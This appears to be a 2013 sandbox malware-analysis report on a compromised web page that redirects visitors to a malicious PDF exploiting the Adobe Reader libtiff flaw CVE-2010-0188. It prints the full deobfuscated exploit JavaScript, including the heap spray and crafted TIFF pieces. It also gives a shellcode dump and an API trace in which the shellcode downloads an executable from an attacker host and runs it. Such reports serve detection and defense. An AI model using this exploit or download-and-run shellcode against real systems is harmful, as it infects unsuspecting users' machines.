Analysis report for http://aod.org.hk/help/index2.php
Sample Overview¶
| URL | http://aod.org.hk/help/index2.php |
|---|---|
| Domain | aod.org.hk |
| Analysis Started | 2013-01-28 06:11:03 |
| Report Generated | 2013-01-28 06:11:36 |
| Jsand version | 2.3.5 |
See the report for domain aod.org.hk.
Detection results¶
| Detector | Result |
|---|---|
| Jsand 2.3.5 | malicious |
In particular, the following URL was found to contain malicious content:
- http://dynamicfuture.eu/987.pdf
Exploits¶
| Name | Description | Reference |
|---|---|---|
| Adobe Libtiff | Libtiff integer overflow in Adobe Reader and Acrobat | CVE-2010-0188 |
Deobfuscation results¶
Evals
- (repeated 1 time)
// Captured eval() argument: rebuilds the next stage by replacing every "NunnaK"
// marker in `sherman` with the third character of `gicyw` (presumably '%', since
// the result is fed straight to unescape) and decoding it. `sherman` and `gicyw`
// are defined in the landing page itself and are not part of this excerpt.
BruKDa = unescape(sherman.replace(/NunnaK/g, gicyw.charAt(2)));
- (repeated 1 time)
/*adherkmkm xy*/
// Deobfuscated Acrobat JavaScript stage captured by the sandbox. The report
// ties it to CVE-2010-0188 (libtiff integer overflow in Adobe Reader/Acrobat,
// see the Exploits table above) and to http://dynamicfuture.eu/987.pdf.
// It does two things: sprays the heap with shellcode, then hands Reader a
// crafted TIFF image through a form field. `app` and `alltroxd4s` are not
// defined in this excerpt; they come from the host PDF.

// Array that receives the heap-spray blocks (filled by heap_spray3 below).
// The initial contents are irrelevant and are overwritten.
var j_IgC = [31, 31, 15, 23];

// Indirection to the Acrobat JavaScript `app` object (not defined here);
// only its viewerVersion is used, in get_ver().
function _k_m(){
  return app;
}

// Thin wrapper around unescape(): decodes %XX / %uXXXX sequences.
function _b_(xVgFqV){
  var ___N = '';
  ___N = unescape(xVgFqV);
  return ___N;
}

// Turns app.viewerVersion into a four-digit integer: only the FIRST '.' is
// removed (String.replace with a string pattern), the result is right-padded
// with '0' to four digits and parsed in base 10.
// E.g. 8 -> "8000" (0x1f40), 8.2 -> "8200", 9.3 -> "9300".
function get_ver(){
  var ver = _k_m().viewerVersion.toString();
  ver = ver.replace('.', '');   // removes only the first '.'
  while (ver.length < 4){
    ver += '0';
  }
  ver = parseInt(ver, 10);
  return ver;
}

// Grows `xVgFqV` by self-concatenation until it covers `len` BYTES, then cuts
// it to len/2 characters: the code treats every JS string character as two
// bytes (cf. `sclen = scode.length * 2` in heap_spray3).
function make_block(xVgFqV, len){
  while (xVgFqV.length * 2 < len){
    xVgFqV += xVgFqV;
  }
  xVgFqV = xVgFqV.substring(0, len / 2);
  return xVgFqV;
}

// Heap spray. `scode` is %u-encoded shellcode (see str2uni). Each block is the
// decoded shellcode followed by %u9090 filler (0x90 is the classic x86 NOP
// sled byte) up to 0x2000 bytes, then replicated to 0x80000 - 0x40 bytes;
// 0x190 (400) such blocks are kept alive in j_IgC. Dropping the last character
// and re-appending the filler presumably forces a fresh string allocation per
// iteration instead of 400 references to one block -- TODO confirm.
function heap_spray3(scode){
  scode = _b_(scode);
  var sclen = scode.length * 2;   // shellcode size in bytes
  var fxcvxx = _b_('%u9090');
  var spray = make_block(fxcvxx, 0x2000 - sclen);
  var block = scode + spray;
  block = make_block(block, 0x80000 - 0x40);
  for (var i = 0; i < 0x190; i ++ ){
    j_IgC[i] = block.substr(0, block.length - 1) + fxcvxx;
  }
  return ;
}

// Like make_block, but `len` is a character count, not a byte count.
function make_str(xVgFqV, len){
  while (xVgFqV.length < len){
    xVgFqV += xVgFqV;
  }
  xVgFqV = xVgFqV.substring(0, len);
  return xVgFqV;
}

// Hex-encodes a number and left-pads with '0' to an even number of digits.
// Note: NaN.toString(16) is "NaN" (3 chars), so a NaN input yields "0NaN";
// that is what produces the `%u0NaN00` tail visible in the report's shellcode
// dump (charCodeAt past the end of an odd-length string in str2uni).
function num2hex(num){
  var xVgFqV = num.toString(16);
  var len = xVgFqV.length;
  var ret = (len % 2) ? '0' + xVgFqV : xVgFqV;
  return ret;
}

// Turns a byte string into %uXXXX escapes, two input bytes per escape with the
// SECOND byte written first (each pair becomes one 16-bit unit whose low byte
// is the first input byte).
function str2uni(xVgFqV){
  var ret = '';
  for (var i = 0; i < xVgFqV.length; i += 2){
    ret += '%u';
    ret += num2hex(xVgFqV.charCodeAt(i + 1));   // NaN on an odd-length input
    ret += num2hex(xVgFqV.charCodeAt(i));
  }
  return ret;
}

// Decodes a hex string into one character per byte. The spaces inside the hex
// and base64 literals below would corrupt this decoding; they look like
// line-wrapping inserted by the report renderer rather than part of the
// original sample -- confirm against the raw PDF before reusing the blobs.
function hex2str(hex){
  var ret = '';
  for (var i = 0; i < hex.length; i += 2){
    var b = hex.substr(i, 2);
    var num = parseInt(b, 16);
    ret += String.fromCharCode(num);
  }
  return ret;
}

// Entry point; invoked before its definition (function hoisting).
splaui();

// Builds the malicious TIFF and triggers the parser. Only runs when
// get_ver() >= 0x1f40 (8000, i.e. viewer 8.0 and later). The image is
// assembled from base64 pieces: `tiff` decodes to a little-endian TIFF header
// ("II*\0" + IFD offset), `nops` is 0x2ae8 characters of "QUFB" ("AAA")
// filler, `start` presumably is the IFD carrying the overflowing tag, and
// `foot` is version-specific. Two `foot`/`sc_hex` variants are selected around
// 0x2009 (8201; 8.2.0 and below take the first). The two shellcode blobs differ
// only in a handful of embedded 0x4a80xxxx-style dwords, presumably addresses
// inside a Reader module -- TODO confirm by diffing the blobs.
// Per the report's API trace, the shellcode downloads
// http://dynamicfuture.eu/62.html to %TEMP%\wpbt0.dll and runs it via WinExec,
// both directly and through `regsvr32 -s`.
function splaui(){
  var ver = get_ver();
  if (ver >= 0x1f40){
    var tiff = 'SUkqADggAABB';
    var nops = make_str('QUFB', 0x2ae8);
    var start = ' QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    var foot = '';
    var sc_hex = '';
    if (ver < 0x2009){
      foot = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
      // re-declaration of sc_hex; harmless with `var` (function-scoped)
      var sc_hex = ' 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000 0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b 1bc64679361a2f70687474703a2f2f64796e616d69636675747572652e65752f36322e68746d6c0000';
    } else {
      foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
      sc_hex = ' 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b 1bc64679361a2f70687474703a2f2f64796e616d69636675747572652e65752f36322e68746d6c0000';
    }
    if (foot.length){
      var ret = [tiff, nops, start, foot].join('');
      var sc_str = hex2str(sc_hex);
      var scode = str2uni(sc_str);
      heap_spray3(scode);
      // `alltroxd4s` is not defined in this excerpt; presumably an XFA image
      // field of the PDF form, so assigning rawValue makes Reader parse the
      // crafted TIFF -- confirm against the PDF's XFA template.
      alltroxd4s.rawValue = ret;
    }
  }
}
Writes
No writes.
Network Activity¶
Requests
| URL | Status | Content Type |
|---|---|---|
| http://aod.org.hk/help/index2.php | 200 | text/html |
| about:blank | 200 | text/html |
| http://113.208.12.120/akvt.html | 302 | text/html |
| http://dynamicfuture.eu/akvt.htm | 200 | text/html |
| http://dynamicfuture.eu/332.jar | 200 | application/zip |
| http://dynamicfuture.eu/887.jar | 404 | empty |
| http://dynamicfuture.eu/987.pdf | 200 | application/pdf |
Redirects
| From | To |
|---|---|
| http://113.208.12.120/akvt.html | http://dynamicfuture.eu/akvt.htm |
ActiveX controls¶
- AcroPDF.PDF — no attribute setting or method call detected
- Msxml2.XMLHTTP — no attribute setting or method call detected
Shellcode¶
| Hexadecimal | ASCII |
|---|---|
4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30 20 82 4a 6e 2f 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41 41 41 41 41 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02 eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83 c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 64 79 6e 61 6d 69 63 66 75 74 75 72 65 2e 65 75 2f 36 32 2e 68 74 6d 6c 00 25 00 75 00 30 00 4e 00 61 00 4e 00 30 00 30 00 | L.`....J<.`..c.J ...J0..Jn/.JAAAA &............... .9.Jd.`.....AAAA AAAAf......u4._3 .d.@0.@..p.V.v.3 .f.^<.t3,....... .@0.F9.u..4$..uQ ..LQV.u<.t5x..V. v...3.IA....3... .8.t......@..;.u .^.^$..f..K.F..T $...........^Y.. S..h..}.3t.....h ...j.Y.......... ..XPj@h....P...P U...^......hon.. hurlmT........a. .....r.......\$. ..$regs.D$.vr32. D$..-s.Sh.....V. ..3.Q.D..wpbt.D. ..dll.D...Y...0. D..AQj.j.SWj..V. ..u.j.S.V.j....S .V........G.?.u. G.?.u.j.j..V.... ...N.......o..3. 
.[..Fy6./phttp:/ /dynamicfuture.e u/62.html.%.u.0. N.a.N.0.0. |
This shellcode was found on http://dynamicfuture.eu/987.pdf; it is the `sc_hex` blob of the deobfuscated script above after `hex2str`/`str2uni` encoding. The trailing UTF-16 bytes `%u0NaN00` (`25 00 75 00 30 00 4e 00 61 00 4e 00 30 00 30 00`) are not payload: they appear to be an encoding leftover (`charCodeAt` past the end of the string gives NaN, which `num2hex` renders as `0NaN`). Correspondingly, the download attempts in the API trace below whose `szURL` is a single character (`%`, `u`, `0`, `N`, `a`, …) look like the emulated shellcode walking past the real URL's terminator into those bytes; the only genuine download target is http://dynamicfuture.eu/62.html.
Shellcode Analysis
Shellcode API Trace
| Offset | DLL.API Name and arguments | Return value |
|---|---|---|
| 0x7c801ad9 | kernel32.VirtualProtect(lpAddress=0x4020f8, dwSize=255) | 1 |
| 0x7c801d7b | kernel32.LoadLibraryA(lpFileName=urlmon) | 0x1a400000 |
| 0x7c835dfa | kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=http://dynamicfuture.eu/62.html, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=%, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=u, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt2.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt2.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt2.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=0, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt3.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt3.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt3.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=N, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt4.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt4.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt4.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=a, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt5.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt5.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt5.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=N, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt6.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt6.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt6.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=0, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt7.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt7.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt7.dll, uCmdShow=0) | |
| 0x1a494bbe | urlmon.URLDownloadToFileA(pCaller=0, szURL=0, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt8.dll) | 0 |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt8.dll, uCmdShow=0) | |
| 0x7c86250d | kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt8.dll, uCmdShow=0) | |
| 0x7c81cb3b | kernel32.TerminateThread(dwExitCode=0) |
Shellcode DLLs
| DLL Name |
|---|
| kernel32.dll |
| urlmon.dll |
Shellcode URLs
| Complete URL | Domain Name | IP Address |
|---|---|---|
| http://dynamicfuture.eu/62.html | dynamicfuture.eu |
Malware¶
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://dynamicfuture.eu/62.html | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | b83a6d31726c6f790772ad885f5ba69c |
Comments